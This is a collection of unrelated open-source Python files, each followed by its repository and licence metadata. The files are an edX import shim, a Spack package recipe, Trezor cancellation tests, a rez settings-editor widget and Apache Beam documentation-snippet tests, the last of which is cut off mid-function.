warn_deprecated_import('grades.rest_api.v1.tests.test_grading_policy_view', 'lms.djangoapps.grades.rest_api.v1.tests.test_grading_policy_view')
from lms.djangoapps.grades.rest_api.v1.tests.test_grading_policy_view import *
|
eduNEXT/edunext-platform
|
import_shims/lms/grades/rest_api/v1/tests/test_grading_policy_view.py
|
Python
|
agpl-3.0
| 470
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RAffyqcreport(RPackage):
"""This package creates a QC report for an AffyBatch object.
The report is intended to allow the user to quickly assess the
quality of a set of arrays in an AffyBatch object."""
homepage = "https://www.bioconductor.org/packages/affyQCReport/"
url = "https://git.bioconductor.org/packages/affyQCReport"
version('1.54.0', git='https://git.bioconductor.org/packages/affyQCReport', commit='5572e9981dc874b78b4adebf58080cac3fbb69e1')
depends_on('r@3.4.0:3.4.9', when='@1.54.0')
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-affy', type=('build', 'run'))
depends_on('r-lattice', type=('build', 'run'))
depends_on('r-affyplm', type=('build', 'run'))
depends_on('r-genefilter', type=('build', 'run'))
depends_on('r-rcolorbrewer', type=('build', 'run'))
depends_on('r-simpleaffy', type=('build', 'run'))
depends_on('r-xtable', type=('build', 'run'))
|
EmreAtes/spack
|
var/spack/repos/builtin/packages/r-affyqcreport/package.py
|
Python
|
lgpl-2.1
| 2,212
|
# This file is part of the Trezor project.
#
# Copyright (C) 2012-2018 SatoshiLabs and contributors
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3
# as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the License along with this library.
# If not, see <https://www.gnu.org/licenses/lgpl-3.0.html>.
import pytest
import trezorlib.messages as m
from .conftest import setup_client
@setup_client()
@pytest.mark.parametrize(
"message",
[
m.Ping(message="hello", button_protection=True),
m.GetAddress(
address_n=[0],
coin_name="Bitcoin",
script_type=m.InputScriptType.SPENDADDRESS,
show_display=True,
),
],
)
def test_cancel_message_via_cancel(client, message):
resp = client.call_raw(message)
assert isinstance(resp, m.ButtonRequest)
client.transport.write(m.ButtonAck())
client.transport.write(m.Cancel())
resp = client.transport.read()
assert isinstance(resp, m.Failure)
assert resp.code == m.FailureType.ActionCancelled
@setup_client()
@pytest.mark.parametrize(
"message",
[
m.Ping(message="hello", button_protection=True),
m.GetAddress(
address_n=[0],
coin_name="Bitcoin",
script_type=m.InputScriptType.SPENDADDRESS,
show_display=True,
),
],
)
def test_cancel_message_via_initialize(client, message):
resp = client.call_raw(message)
assert isinstance(resp, m.ButtonRequest)
client.transport.write(m.ButtonAck())
client.transport.write(m.Initialize())
resp = client.transport.read()
assert isinstance(resp, m.Features)
|
romanz/python-trezor
|
trezorlib/tests/device_tests/test_cancel.py
|
Python
|
lgpl-3.0
| 2,032
|
from rezgui.qt import QtGui
from rezgui.util import create_pane
from rezgui.mixins.ContextViewMixin import ContextViewMixin
from rezgui.models.ContextModel import ContextModel
from rez.config import config
from rez.vendor import yaml
from rez.vendor.yaml.error import YAMLError
from rez.vendor.schema.schema import Schema, SchemaError, Or, And, Use
from functools import partial
class ContextSettingsWidget(QtGui.QWidget, ContextViewMixin):
titles = {
"packages_path": "Search path for Rez packages",
"implicit_packages": "Packages that are implicitly added to the request",
"package_filter": "Package exclusion/inclusion rules"
}
schema_dict = {
"packages_path": [basestring],
"implicit_packages": [basestring],
"package_filter": Or(And(None, Use(lambda x: [])),
And(dict, Use(lambda x: [x])),
[dict])
}
def __init__(self, context_model=None, attributes=None, parent=None):
"""
Args:
attributes (list of str): Select only certain settings to expose. If
None, all settings are exposed.
"""
super(ContextSettingsWidget, self).__init__(parent)
ContextViewMixin.__init__(self, context_model)
self.schema_keys = set(self.schema_dict.iterkeys())
if attributes:
self.schema_keys &= set(attributes)
assert self.schema_keys
schema_dict = dict((k, v) for k, v in self.schema_dict.iteritems()
if k in self.schema_keys)
self.schema = Schema(schema_dict)
self.edit = QtGui.QTextEdit()
self.edit.setStyleSheet("font: 12pt 'Courier'")
self.default_btn = QtGui.QPushButton("Set To Defaults")
self.discard_btn = QtGui.QPushButton("Discard Changes...")
self.apply_btn = QtGui.QPushButton("Apply")
self.discard_btn.setEnabled(False)
self.apply_btn.setEnabled(False)
btn_pane = create_pane([None, self.default_btn, self.discard_btn,
self.apply_btn], True)
layout = QtGui.QVBoxLayout()
layout.addWidget(self.edit)
layout.addWidget(btn_pane)
self.setLayout(layout)
self.apply_btn.clicked.connect(self.apply_changes)
self.default_btn.clicked.connect(self.set_defaults)
self.discard_btn.clicked.connect(partial(self.discard_changes, True))
self.edit.textChanged.connect(self._settingsChanged)
self._update_text()
def _contextChanged(self, flags=0):
if not (flags & ContextModel.CONTEXT_CHANGED):
return
self._update_text()
def apply_changes(self):
def _content_error(title, text):
ret = QtGui.QMessageBox.warning(self, title, text,
QtGui.QMessageBox.Discard,
QtGui.QMessageBox.Cancel)
if ret == QtGui.QMessageBox.Discard:
self.discard_changes()
# load new content
try:
txt = self.edit.toPlainText()
data = yaml.load(str(txt))
except YAMLError as e:
_content_error("Invalid syntax", str(e))
return
# check against schema
if self.schema:
try:
data = self.schema.validate(data)
except SchemaError as e:
_content_error("Settings validation failure", str(e))
return
# apply to context model
self.context_model.set_packages_path(data["packages_path"])
self.context_model.set_package_filter(data["package_filter"])
self._update_text()
def discard_changes(self, prompt=False):
if prompt:
ret = QtGui.QMessageBox.warning(
self,
"The context settings have been modified.",
"Your changes will be lost. Are you sure?",
QtGui.QMessageBox.Ok,
QtGui.QMessageBox.Cancel)
if ret != QtGui.QMessageBox.Ok:
return
self._update_text()
def set_defaults(self):
packages_path = config.packages_path
implicits = [str(x) for x in config.implicit_packages]
package_filter = config.package_filter
data = {"packages_path": packages_path,
"implicit_packages": implicits,
"package_filter": package_filter}
data = dict((k, v) for k, v in data.iteritems()
if k in self.schema_keys)
self._set_text(data)
self.discard_btn.setEnabled(True)
self.apply_btn.setEnabled(True)
def _update_text(self):
model = self.context_model
implicits = [str(x) for x in model.implicit_packages]
data = {"packages_path": model.packages_path,
"implicit_packages": implicits,
"package_filter": model.package_filter}
data = dict((k, v) for k, v in data.iteritems()
if k in self.schema_keys)
self._set_text(data)
self.discard_btn.setEnabled(False)
self.apply_btn.setEnabled(False)
def _set_text(self, data):
lines = []
for key, value in data.iteritems():
lines.append('')
txt = yaml.dump({key: value}, default_flow_style=False)
title = self.titles.get(key)
if title:
lines.append("# %s" % title)
lines.append(txt.rstrip())
txt = '\n'.join(lines) + '\n'
txt = txt.lstrip()
self.edit.setPlainText(txt)
def _settingsChanged(self):
self.discard_btn.setEnabled(True)
self.apply_btn.setEnabled(True)
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
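# ---------------------------------------------------------------------------
# Editor's sketch (not part of the original module): a minimal, hypothetical
# way to show ContextSettingsWidget on its own, exposing only a subset of
# settings via the `attributes` argument documented in __init__. It assumes
# ContextModel() can be constructed with no arguments here; in rezgui the
# model is normally supplied by the surrounding tool.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    app = QtGui.QApplication([])
    model = ContextModel()
    widget = ContextSettingsWidget(
        context_model=model,
        attributes=["packages_path", "implicit_packages"])
    widget.setWindowTitle("Context Settings")
    widget.show()
    app.exec_()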
|
LumaPictures/rez
|
src/rezgui/widgets/ContextSettingsWidget.py
|
Python
|
lgpl-3.0
| 6,497
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for all code snippets used in public docs."""
import glob
import gzip
import logging
import os
import tempfile
import unittest
import uuid
import apache_beam as beam
from apache_beam import coders
from apache_beam import pvalue
from apache_beam import typehints
from apache_beam.transforms.util import assert_that
from apache_beam.transforms.util import equal_to
from apache_beam.utils.pipeline_options import TypeOptions
from apache_beam.examples.snippets import snippets
# pylint: disable=expression-not-assigned
from apache_beam.test_pipeline import TestPipeline
# Protect against environments where apitools library is not available.
# pylint: disable=wrong-import-order, wrong-import-position
try:
from apitools.base.py import base_api
except ImportError:
base_api = None
# pylint: enable=wrong-import-order, wrong-import-position
# Protect against environments where datastore library is not available.
# pylint: disable=wrong-import-order, wrong-import-position
try:
from google.cloud.proto.datastore.v1 import datastore_pb2
except ImportError:
datastore_pb2 = None
# pylint: enable=wrong-import-order, wrong-import-position
class ParDoTest(unittest.TestCase):
"""Tests for model/par-do."""
def test_pardo(self):
# Note: "words" and "ComputeWordLengthFn" are referenced by name in
# the text of the doc.
words = ['aa', 'bbb', 'c']
# [START model_pardo_pardo]
class ComputeWordLengthFn(beam.DoFn):
def process(self, element):
return [len(element)]
# [END model_pardo_pardo]
# [START model_pardo_apply]
# Apply a ParDo to the PCollection "words" to compute lengths for each word.
word_lengths = words | beam.ParDo(ComputeWordLengthFn())
# [END model_pardo_apply]
self.assertEqual({2, 3, 1}, set(word_lengths))
def test_pardo_yield(self):
words = ['aa', 'bbb', 'c']
# [START model_pardo_yield]
class ComputeWordLengthFn(beam.DoFn):
def process(self, element):
yield len(element)
# [END model_pardo_yield]
word_lengths = words | beam.ParDo(ComputeWordLengthFn())
self.assertEqual({2, 3, 1}, set(word_lengths))
def test_pardo_using_map(self):
words = ['aa', 'bbb', 'c']
# [START model_pardo_using_map]
word_lengths = words | beam.Map(len)
# [END model_pardo_using_map]
self.assertEqual({2, 3, 1}, set(word_lengths))
def test_pardo_using_flatmap(self):
words = ['aa', 'bbb', 'c']
# [START model_pardo_using_flatmap]
word_lengths = words | beam.FlatMap(lambda word: [len(word)])
# [END model_pardo_using_flatmap]
self.assertEqual({2, 3, 1}, set(word_lengths))
def test_pardo_using_flatmap_yield(self):
words = ['aA', 'bbb', 'C']
# [START model_pardo_using_flatmap_yield]
def capitals(word):
for letter in word:
if 'A' <= letter <= 'Z':
yield letter
all_capitals = words | beam.FlatMap(capitals)
# [END model_pardo_using_flatmap_yield]
self.assertEqual({'A', 'C'}, set(all_capitals))
def test_pardo_with_label(self):
# pylint: disable=line-too-long
words = ['aa', 'bbc', 'defg']
# [START model_pardo_with_label]
result = words | 'CountUniqueLetters' >> beam.Map(
lambda word: len(set(word)))
# [END model_pardo_with_label]
self.assertEqual({1, 2, 4}, set(result))
def test_pardo_side_input(self):
p = TestPipeline()
words = p | 'start' >> beam.Create(['a', 'bb', 'ccc', 'dddd'])
# [START model_pardo_side_input]
# Callable takes additional arguments.
def filter_using_length(word, lower_bound, upper_bound=float('inf')):
if lower_bound <= len(word) <= upper_bound:
yield word
# Construct a deferred side input.
avg_word_len = (words
| beam.Map(len)
| beam.CombineGlobally(beam.combiners.MeanCombineFn()))
# Call with explicit side inputs.
small_words = words | 'small' >> beam.FlatMap(filter_using_length, 0, 3)
# A single deferred side input.
larger_than_average = (words | 'large' >> beam.FlatMap(
filter_using_length,
lower_bound=pvalue.AsSingleton(avg_word_len)))
# Mix and match.
small_but_nontrivial = words | beam.FlatMap(filter_using_length,
lower_bound=2,
upper_bound=pvalue.AsSingleton(
avg_word_len))
# [END model_pardo_side_input]
beam.assert_that(small_words, beam.equal_to(['a', 'bb', 'ccc']))
beam.assert_that(larger_than_average, beam.equal_to(['ccc', 'dddd']),
label='larger_than_average')
beam.assert_that(small_but_nontrivial, beam.equal_to(['bb']),
label='small_but_not_trivial')
p.run()
def test_pardo_side_input_dofn(self):
words = ['a', 'bb', 'ccc', 'dddd']
# [START model_pardo_side_input_dofn]
class FilterUsingLength(beam.DoFn):
def process(self, element, lower_bound, upper_bound=float('inf')):
if lower_bound <= len(element) <= upper_bound:
yield element
small_words = words | beam.ParDo(FilterUsingLength(), 0, 3)
# [END model_pardo_side_input_dofn]
self.assertEqual({'a', 'bb', 'ccc'}, set(small_words))
def test_pardo_with_side_outputs(self):
# [START model_pardo_emitting_values_on_side_outputs]
class ProcessWords(beam.DoFn):
def process(self, element, cutoff_length, marker):
if len(element) <= cutoff_length:
# Emit this short word to the main output.
yield element
else:
# Emit this word's long length to a side output.
yield pvalue.SideOutputValue(
'above_cutoff_lengths', len(element))
if element.startswith(marker):
# Emit this word to a different side output.
yield pvalue.SideOutputValue('marked strings', element)
# [END model_pardo_emitting_values_on_side_outputs]
words = ['a', 'an', 'the', 'music', 'xyz']
# [START model_pardo_with_side_outputs]
results = (words | beam.ParDo(ProcessWords(), cutoff_length=2, marker='x')
.with_outputs('above_cutoff_lengths', 'marked strings',
main='below_cutoff_strings'))
below = results.below_cutoff_strings
above = results.above_cutoff_lengths
marked = results['marked strings'] # indexing works as well
# [END model_pardo_with_side_outputs]
self.assertEqual({'a', 'an'}, set(below))
self.assertEqual({3, 5}, set(above))
self.assertEqual({'xyz'}, set(marked))
# [START model_pardo_with_side_outputs_iter]
below, above, marked = (words
| beam.ParDo(
ProcessWords(), cutoff_length=2, marker='x')
.with_outputs('above_cutoff_lengths',
'marked strings',
main='below_cutoff_strings'))
# [END model_pardo_with_side_outputs_iter]
self.assertEqual({'a', 'an'}, set(below))
self.assertEqual({3, 5}, set(above))
self.assertEqual({'xyz'}, set(marked))
def test_pardo_with_undeclared_side_outputs(self):
numbers = [1, 2, 3, 4, 5, 10, 20]
# [START model_pardo_with_side_outputs_undeclared]
def even_odd(x):
yield pvalue.SideOutputValue('odd' if x % 2 else 'even', x)
if x % 10 == 0:
yield x
results = numbers | beam.FlatMap(even_odd).with_outputs()
evens = results.even
odds = results.odd
tens = results[None] # the undeclared main output
# [END model_pardo_with_side_outputs_undeclared]
self.assertEqual({2, 4, 10, 20}, set(evens))
self.assertEqual({1, 3, 5}, set(odds))
self.assertEqual({10, 20}, set(tens))
class TypeHintsTest(unittest.TestCase):
def test_bad_types(self):
p = TestPipeline()
evens = None # pylint: disable=unused-variable
# [START type_hints_missing_define_numbers]
numbers = p | beam.Create(['1', '2', '3'])
# [END type_hints_missing_define_numbers]
# Consider the following code.
# pylint: disable=expression-not-assigned
# pylint: disable=unused-variable
# [START type_hints_missing_apply]
evens = numbers | beam.Filter(lambda x: x % 2 == 0)
# [END type_hints_missing_apply]
# Now suppose numbers was defined as [snippet above].
# When running this pipeline, you'd get a runtime error,
# possibly on a remote machine, possibly very late.
with self.assertRaises(TypeError):
p.run()
# To catch this early, we can assert what types we expect.
with self.assertRaises(typehints.TypeCheckError):
# [START type_hints_takes]
p.options.view_as(TypeOptions).pipeline_type_check = True
evens = numbers | beam.Filter(lambda x: x % 2 == 0).with_input_types(int)
# [END type_hints_takes]
# Type hints can be declared on DoFns and callables as well, rather
# than where they're used, to be more self contained.
with self.assertRaises(typehints.TypeCheckError):
# [START type_hints_do_fn]
@beam.typehints.with_input_types(int)
class FilterEvensDoFn(beam.DoFn):
def process(self, element):
if element % 2 == 0:
yield element
evens = numbers | beam.ParDo(FilterEvensDoFn())
# [END type_hints_do_fn]
words = p | 'words' >> beam.Create(['a', 'bb', 'c'])
# One can assert outputs and apply them to transforms as well.
# Helps document the contract and checks it at pipeline construction time.
# [START type_hints_transform]
T = beam.typehints.TypeVariable('T')
@beam.typehints.with_input_types(T)
@beam.typehints.with_output_types(beam.typehints.Tuple[int, T])
class MyTransform(beam.PTransform):
def expand(self, pcoll):
return pcoll | beam.Map(lambda x: (len(x), x))
words_with_lens = words | MyTransform()
# [END type_hints_transform]
# pylint: disable=expression-not-assigned
with self.assertRaises(typehints.TypeCheckError):
words_with_lens | beam.Map(lambda x: x).with_input_types(
beam.typehints.Tuple[int, int])
def test_runtime_checks_off(self):
# pylint: disable=expression-not-assigned
p = TestPipeline()
# [START type_hints_runtime_off]
p | beam.Create(['a']) | beam.Map(lambda x: 3).with_output_types(str)
p.run()
# [END type_hints_runtime_off]
def test_runtime_checks_on(self):
# pylint: disable=expression-not-assigned
p = TestPipeline()
with self.assertRaises(typehints.TypeCheckError):
# [START type_hints_runtime_on]
p.options.view_as(TypeOptions).runtime_type_check = True
p | beam.Create(['a']) | beam.Map(lambda x: 3).with_output_types(str)
p.run()
# [END type_hints_runtime_on]
def test_deterministic_key(self):
p = TestPipeline()
lines = (p | beam.Create(
['banana,fruit,3', 'kiwi,fruit,2', 'kiwi,fruit,2', 'zucchini,veg,3']))
# [START type_hints_deterministic_key]
class Player(object):
def __init__(self, team, name):
self.team = team
self.name = name
class PlayerCoder(beam.coders.Coder):
def encode(self, player):
return '%s:%s' % (player.team, player.name)
def decode(self, s):
return Player(*s.split(':'))
def is_deterministic(self):
return True
beam.coders.registry.register_coder(Player, PlayerCoder)
def parse_player_and_score(csv):
name, team, score = csv.split(',')
return Player(team, name), int(score)
totals = (
lines
| beam.Map(parse_player_and_score)
| beam.CombinePerKey(sum).with_input_types(
beam.typehints.Tuple[Player, int]))
# [END type_hints_deterministic_key]
assert_that(
totals | beam.Map(lambda (k, v): (k.name, v)),
equal_to([('banana', 3), ('kiwi', 4), ('zucchini', 3)]))
p.run()
class SnippetsTest(unittest.TestCase):
# Replacing text read/write transforms with dummy transforms for testing.
class DummyReadTransform(beam.PTransform):
"""A transform that will replace iobase.ReadFromText.
To be used for testing.
"""
def __init__(self, file_to_read=None, compression_type=None):
self.file_to_read = file_to_read
self.compression_type = compression_type
class ReadDoFn(beam.DoFn):
def __init__(self, file_to_read, compression_type):
self.file_to_read = file_to_read
self.compression_type = compression_type
self.coder = coders.StrUtf8Coder()
def process(self, element):
pass
def finish_bundle(self):
assert self.file_to_read
for file_name in glob.glob(self.file_to_read):
if self.compression_type is None:
with open(file_name) as file:
for record in file:
yield self.coder.decode(record.rstrip('\n'))
else:
with gzip.open(file_name, 'r') as file:
for record in file:
yield self.coder.decode(record.rstrip('\n'))
def expand(self, pcoll):
return pcoll | beam.Create([None]) | 'DummyReadForTesting' >> beam.ParDo(
SnippetsTest.DummyReadTransform.ReadDoFn(
self.file_to_read, self.compression_type))
class DummyWriteTransform(beam.PTransform):
"""A transform that will replace iobase.WriteToText.
To be used for testing.
"""
def __init__(self, file_to_write=None, file_name_suffix=''):
self.file_to_write = file_to_write
class WriteDoFn(beam.DoFn):
def __init__(self, file_to_write):
self.file_to_write = file_to_write
self.file_obj = None
self.coder = coders.ToStringCoder()
def start_bundle(self):
assert self.file_to_write
self.file_to_write += str(uuid.uuid4())
self.file_obj = open(self.file_to_write, 'w')
def process(self, element):
assert self.file_obj
self.file_obj.write(self.coder.encode(element) + '\n')
def finish_bundle(self):
assert self.file_obj
self.file_obj.close()
def expand(self, pcoll):
return pcoll | 'DummyWriteForTesting' >> beam.ParDo(
SnippetsTest.DummyWriteTransform.WriteDoFn(self.file_to_write))
def setUp(self):
self.old_read_from_text = beam.io.ReadFromText
self.old_write_to_text = beam.io.WriteToText
# Monkey patching to allow testing pipelines defined in snippets.py using
# real data.
beam.io.ReadFromText = SnippetsTest.DummyReadTransform
beam.io.WriteToText = SnippetsTest.DummyWriteTransform
self.temp_files = []
def tearDown(self):
beam.io.ReadFromText = self.old_read_from_text
beam.io.WriteToText = self.old_write_to_text
# Cleanup all the temporary files created in the test
map(os.remove, self.temp_files)
def create_temp_file(self, contents=''):
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(contents)
self.temp_files.append(f.name)
return f.name
def get_output(self, path, sorted_output=True, suffix=''):
all_lines = []
for file_name in glob.glob(path + '*'):
with open(file_name) as f:
lines = f.readlines()
all_lines.extend([s.rstrip('\n') for s in lines])
if sorted_output:
return sorted(s.rstrip('\n') for s in all_lines)
else:
return all_lines
def test_model_pipelines(self):
temp_path = self.create_temp_file('aa bb cc\n bb cc\n cc')
result_path = temp_path + '.result'
snippets.model_pipelines([
'--input=%s*' % temp_path,
'--output=%s' % result_path])
self.assertEqual(
self.get_output(result_path),
[str(s) for s in [(u'aa', 1), (u'bb', 2), (u'cc', 3)]])
def test_model_pcollection(self):
temp_path = self.create_temp_file()
snippets.model_pcollection(['--output=%s' % temp_path])
self.assertEqual(self.get_output(temp_path, sorted_output=False), [
'To be, or not to be: that is the question: ',
'Whether \'tis nobler in the mind to suffer ',
'The slings and arrows of outrageous fortune, ',
'Or to take arms against a sea of troubles, '])
def test_construct_pipeline(self):
temp_path = self.create_temp_file(
'abc def ghi\n jkl mno pqr\n stu vwx yz')
result_path = self.create_temp_file()
snippets.construct_pipeline({'read': temp_path, 'write': result_path})
self.assertEqual(
self.get_output(result_path),
['cba', 'fed', 'ihg', 'lkj', 'onm', 'rqp', 'uts', 'xwv', 'zy'])
def test_model_custom_source(self):
snippets.model_custom_source(100)
def test_model_custom_sink(self):
tempdir_name = tempfile.mkdtemp()
class SimpleKV(object):
def __init__(self, tmp_dir):
self._dummy_token = 'dummy_token'
self._tmp_dir = tmp_dir
def connect(self, url):
return self._dummy_token
def open_table(self, access_token, table_name):
assert access_token == self._dummy_token
file_name = self._tmp_dir + os.sep + table_name
assert not os.path.exists(file_name)
open(file_name, 'wb').close()
return table_name
def write_to_table(self, access_token, table_name, key, value):
assert access_token == self._dummy_token
file_name = self._tmp_dir + os.sep + table_name
assert os.path.exists(file_name)
with open(file_name, 'ab') as f:
f.write(key + ':' + value + os.linesep)
def rename_table(self, access_token, old_name, new_name):
assert access_token == self._dummy_token
old_file_name = self._tmp_dir + os.sep + old_name
new_file_name = self._tmp_dir + os.sep + new_name
assert os.path.isfile(old_file_name)
assert not os.path.exists(new_file_name)
os.rename(old_file_name, new_file_name)
snippets.model_custom_sink(
SimpleKV(tempdir_name),
[('key' + str(i), 'value' + str(i)) for i in range(100)],
'final_table_no_ptransform', 'final_table_with_ptransform')
expected_output = [
'key' + str(i) + ':' + 'value' + str(i) for i in range(100)]
glob_pattern = tempdir_name + os.sep + 'final_table_no_ptransform*'
output_files = glob.glob(glob_pattern)
assert output_files
received_output = []
for file_name in output_files:
with open(file_name) as f:
for line in f:
received_output.append(line.rstrip(os.linesep))
self.assertItemsEqual(expected_output, received_output)
glob_pattern = tempdir_name + os.sep + 'final_table_with_ptransform*'
output_files = glob.glob(glob_pattern)
assert output_files
received_output = []
for file_name in output_files:
with open(file_name) as f:
for line in f:
received_output.append(line.rstrip(os.linesep))
self.assertItemsEqual(expected_output, received_output)
def test_model_textio(self):
temp_path = self.create_temp_file('aa bb cc\n bb cc\n cc')
result_path = temp_path + '.result'
snippets.model_textio({'read': temp_path, 'write': result_path})
self.assertEqual(
['aa', 'bb', 'bb', 'cc', 'cc', 'cc'],
self.get_output(result_path, suffix='.csv'))
def test_model_textio_compressed(self):
temp_path = self.create_temp_file('aa\nbb\ncc')
gzip_file_name = temp_path + '.gz'
with open(temp_path) as src, gzip.open(gzip_file_name, 'wb') as dst:
dst.writelines(src)
# Add the temporary gzip file to be cleaned up as well.
self.temp_files.append(gzip_file_name)
snippets.model_textio_compressed(
{'read': gzip_file_name}, ['aa', 'bb', 'cc'])
@unittest.skipIf(datastore_pb2 is None, 'GCP dependencies are not installed')
def test_model_datastoreio(self):
    # We cannot test datastoreio functionality in unit tests, therefore we
    # limit ourselves to making sure the pipeline containing Datastore read
    # and write transforms can be built.
    # TODO(vikasrk): Explore using Datastore Emulator.
snippets.model_datastoreio()
@unittest.skipIf(base_api is None, 'GCP dependencies are not installed')
def test_model_bigqueryio(self):
    # We cannot test BigQueryIO functionality in unit tests, therefore we
    # limit ourselves to making sure the pipeline containing BigQuery sources
    # and sinks can be built.
snippets.model_bigqueryio()
def _run_test_pipeline_for_options(self, fn):
temp_path = self.create_temp_file('aa\nbb\ncc')
result_path = temp_path + '.result'
fn([
'--input=%s*' % temp_path,
'--output=%s' % result_path])
self.assertEqual(
['aa', 'bb', 'cc'],
self.get_output(result_path))
def test_pipeline_options_local(self):
self._run_test_pipeline_for_options(snippets.pipeline_options_local)
def test_pipeline_options_remote(self):
self._run_test_pipeline_for_options(snippets.pipeline_options_remote)
def test_pipeline_options_command_line(self):
self._run_test_pipeline_for_options(snippets.pipeline_options_command_line)
def test_pipeline_logging(self):
result_path = self.create_temp_file()
lines = ['we found love right where we are',
'we found love right from the start',
'we found love in a hopeless place']
snippets.pipeline_logging(lines, result_path)
self.assertEqual(
sorted(' '.join(lines).split(' ')),
self.get_output(result_path))
def test_examples_wordcount(self):
pipelines = [snippets.examples_wordcount_minimal,
snippets.examples_wordcount_wordcount,
snippets.pipeline_monitoring]
for pipeline in pipelines:
temp_path = self.create_temp_file(
'abc def ghi\n abc jkl')
result_path = self.create_temp_file()
pipeline({'read': temp_path, 'write': result_path})
self.assertEqual(
self.get_output(result_path),
['abc: 2', 'def: 1', 'ghi: 1', 'jkl: 1'])
def test_examples_wordcount_debugging(self):
temp_path = self.create_temp_file(
'Flourish Flourish Flourish stomach abc def')
result_path = self.create_temp_file()
snippets.examples_wordcount_debugging(
{'read': temp_path, 'write': result_path})
self.assertEqual(
self.get_output(result_path),
['Flourish: 3', 'stomach: 1'])
def test_model_composite_transform_example(self):
contents = ['aa bb cc', 'bb cc', 'cc']
result_path = self.create_temp_file()
snippets.model_composite_transform_example(contents, result_path)
self.assertEqual(['aa: 1', 'bb: 2', 'cc: 3'], self.get_output(result_path))
def test_model_multiple_pcollections_flatten(self):
contents = ['a', 'b', 'c', 'd', 'e', 'f']
result_path = self.create_temp_file()
snippets.model_multiple_pcollections_flatten(contents, result_path)
self.assertEqual(contents, self.get_output(result_path))
def test_model_multiple_pcollections_partition(self):
contents = [17, 42, 64, 32, 0, 99, 53, 89]
result_path = self.create_temp_file()
snippets.model_multiple_pcollections_partition(contents, result_path)
self.assertEqual(['0', '17', '32', '42', '53', '64', '89', '99'],
self.get_output(result_path))
def test_model_group_by_key(self):
contents = ['a bb ccc bb bb a']
result_path = self.create_temp_file()
snippets.model_group_by_key(contents, result_path)
expected = [('a', 2), ('bb', 3), ('ccc', 1)]
self.assertEqual([str(s) for s in expected], self.get_output(result_path))
def test_model_co_group_by_key_tuple(self):
email_list = [['a', 'a@example.com'], ['b', 'b@example.com']]
phone_list = [['a', 'x4312'], ['b', 'x8452']]
result_path = self.create_temp_file()
snippets.model_co_group_by_key_tuple(email_list, phone_list, result_path)
expect = ['a; a@example.com; x4312', 'b; b@example.com; x8452']
self.assertEqual(expect, self.get_output(result_path))
def test_model_join_using_side_inputs(self):
name_list = ['a', 'b']
email_list = [['a', 'a@example.com'], ['b', 'b@example.com']]
phone_list = [['a', 'x4312'], ['b', 'x8452']]
result_path = self.create_temp_file()
snippets.model_join_using_side_inputs(
name_list, email_list, phone_list, result_path)
expect = ['a; a@example.com; x4312', 'b; b@example.com; x8452']
self.assertEqual(expect, self.get_output(result_path))
class CombineTest(unittest.TestCase):
"""Tests for model/combine."""
def test_global_sum(self):
pc = [1, 2, 3]
# [START global_sum]
result = pc | beam.CombineGlobally(sum)
# [END global_sum]
self.assertEqual([6], result)
def test_combine_values(self):
    occurrences = [('cat', 1), ('cat', 5), ('cat', 9), ('dog', 5), ('dog', 2)]
    # [START combine_values]
    first_occurrences = occurrences | beam.GroupByKey() | beam.CombineValues(min)
    # [END combine_values]
    self.assertEqual({('cat', 1), ('dog', 2)}, set(first_occurrences))
def test_combine_per_key(self):
player_accuracies = [
('cat', 1), ('cat', 5), ('cat', 9), ('cat', 1),
('dog', 5), ('dog', 2)]
# [START combine_per_key]
avg_accuracy_per_player = (player_accuracies
| beam.CombinePerKey(
beam.combiners.MeanCombineFn()))
# [END combine_per_key]
self.assertEqual({('cat', 4.0), ('dog', 3.5)}, set(avg_accuracy_per_player))
def test_combine_concat(self):
pc = ['a', 'b']
# [START combine_concat]
def concat(values, separator=', '):
return separator.join(values)
with_commas = pc | beam.CombineGlobally(concat)
with_dashes = pc | beam.CombineGlobally(concat, separator='-')
# [END combine_concat]
self.assertEqual(1, len(with_commas))
self.assertTrue(with_commas[0] in {'a, b', 'b, a'})
self.assertEqual(1, len(with_dashes))
self.assertTrue(with_dashes[0] in {'a-b', 'b-a'})
def test_bounded_sum(self):
# [START combine_bounded_sum]
pc = [1, 10, 100, 1000]
def bounded_sum(values, bound=500):
return min(sum(values), bound)
